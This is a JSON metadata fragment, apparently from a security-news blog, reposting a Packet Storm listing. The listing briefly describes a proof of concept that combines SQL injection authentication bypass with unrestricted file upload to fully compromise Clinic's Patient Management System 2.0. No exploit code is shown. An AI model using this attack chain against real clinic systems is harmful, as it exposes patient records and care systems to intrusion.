{“lastseen”:”2025-12-10T17:38:49″,”description”:”Clinic’s Patient Management System version 2.0 proof of concept that combines SQL injection authentication bypass with an unrestricted file upload to achieve full compromise…”,”published”:”2025-12-10T00:00:00″,”modified”:”2025-12-10T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Clinic’s…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,55,12,13,53,7,11,5],"class_list":["post-30058","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-93","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n